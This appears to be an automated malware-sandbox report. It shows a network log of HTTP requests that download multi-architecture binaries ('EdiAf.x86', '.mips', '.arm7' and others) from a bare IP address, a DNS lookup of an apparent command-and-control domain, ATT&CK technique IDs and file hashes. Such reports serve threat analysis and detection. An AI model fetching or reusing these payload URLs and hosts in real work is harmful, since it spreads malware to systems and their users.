GET http://78.40.117.13/EdiAf.x86

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.mips

http

883 B
36.4kB
14
30

HTTP Request

GET http://78.40.117.13/EdiAf.mips

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.mips

http

770 B
36.2kB
13
29

HTTP Request

GET http://78.40.117.13/EdiAf.mips

HTTP Response

200
78.40.117.13:60255

dasdv1.service1921.club

865 B
690 B
16
13
78.40.117.13:80

http://78.40.117.13/EdiAf.mpsl

http

675 B
37.7kB
10
30

HTTP Request

GET http://78.40.117.13/EdiAf.mpsl

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.mpsl

http

614 B
37.7kB
10
30

HTTP Request

GET http://78.40.117.13/EdiAf.mpsl

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arm

http

778 B
35.3kB
12
29

HTTP Request

GET http://78.40.117.13/EdiAf.arm

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arm

http

769 B
35.3kB
13
29

HTTP Request

GET http://78.40.117.13/EdiAf.arm

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arm5

http

623 B
23.4kB
9
20

HTTP Request

GET http://78.40.117.13/EdiAf.arm5

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arm5

http

510 B
23.4kB
8
20

HTTP Request

GET http://78.40.117.13/EdiAf.arm5

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arm6

http

727 B
39.5kB
11
32

HTTP Request

GET http://78.40.117.13/EdiAf.arm6

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arm6

http

822 B
39.5kB
14
33

HTTP Request

GET http://78.40.117.13/EdiAf.arm6

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arm7

http

883 B
61.6kB
14
47

HTTP Request

GET http://78.40.117.13/EdiAf.arm7

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arm7

http

926 B
61.5kB
16
47

HTTP Request

GET http://78.40.117.13/EdiAf.arm7

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.ppc

http

622 B
33.6kB
9
27

HTTP Request

GET http://78.40.117.13/EdiAf.ppc

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.ppc

http

769 B
33.7kB
13
29

HTTP Request

GET http://78.40.117.13/EdiAf.ppc

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.m68k

http

831 B
81.3kB
13
62

HTTP Request

GET http://78.40.117.13/EdiAf.m68k

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.m68k

http

1.4kB
81.3kB
25
62

HTTP Request

GET http://78.40.117.13/EdiAf.m68k

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.spc

http

1.1kB
79.2kB
18
60

HTTP Request

GET http://78.40.117.13/EdiAf.spc

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.spc

http

1.3kB
79.2kB
23
60

HTTP Request

GET http://78.40.117.13/EdiAf.spc

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.i686

http

467 B
640 B
6
4

HTTP Request

GET http://78.40.117.13/EdiAf.i686

HTTP Response

404
78.40.117.13:80

http://78.40.117.13/EdiAf.i686

http

406 B
584 B
6
4

HTTP Request

GET http://78.40.117.13/EdiAf.i686

HTTP Response

404
78.40.117.13:80

http://78.40.117.13/EdiAf.sh4

http

726 B
70.0kB
11
53

HTTP Request

GET http://78.40.117.13/EdiAf.sh4

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.sh4

http

717 B
69.9kB
12
53

HTTP Request

GET http://78.40.117.13/EdiAf.sh4

HTTP Response

200
78.40.117.13:80

http://78.40.117.13/EdiAf.arc

http

466 B
639 B
6
4

HTTP Request

GET http://78.40.117.13/EdiAf.arc

HTTP Response

404
78.40.117.13:80

http://78.40.117.13/EdiAf.arc

http

405 B
583 B
6
4

HTTP Request

GET http://78.40.117.13/EdiAf.arc

HTTP Response

404

8.8.8.8:53

dasdv1.service1921.club

dns

69 B
85 B
1
1

DNS Request

dasdv1.service1921.club

DNS Response

78.40.117.13

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/EdiAf.x86

Filesize
30KB

MD5
e932653d32b429c51de2046623fa71d2

SHA1
32ecc535e6cf6e99f105835d4a7cb75ef4cb233a

SHA256
87dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612

SHA512
e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2

Download Submit
/tmp/WTH

Filesize
33KB

MD5
029a7185777b7f885a6c3807e46b7365

SHA1
87372b0029b72446861c7b429e3ef1626c337218

SHA256
42c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d

SHA512
4890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8

Download Submit
/tmp/WTH

Filesize
35KB

MD5
7327f58c0e15f6086301a81780e100dc

SHA1
292bb04ad4df407ac687ef1df1071659708bd3bb

SHA256
b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d

SHA512
4cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911

Download Submit
/tmp/WTH

Filesize
32KB

MD5
addb1cd662dd870b9b7ed5273d6fa76e

SHA1
6e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0

SHA256
cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7

SHA512
28525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f

Download Submit
/tmp/WTH

Filesize
21KB

MD5
a117b1b367633cb07f0795bd5f0c6f8f

SHA1
32bfac42c7134383c6381b94c0d75317fcb56d11

SHA256
40fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0

SHA512
7e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726

Download Submit
/tmp/WTH

Filesize
75KB

MD5
642dff628df548a6c458f004fd3b5aa1

SHA1
cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7

SHA256
219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed

SHA512
dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.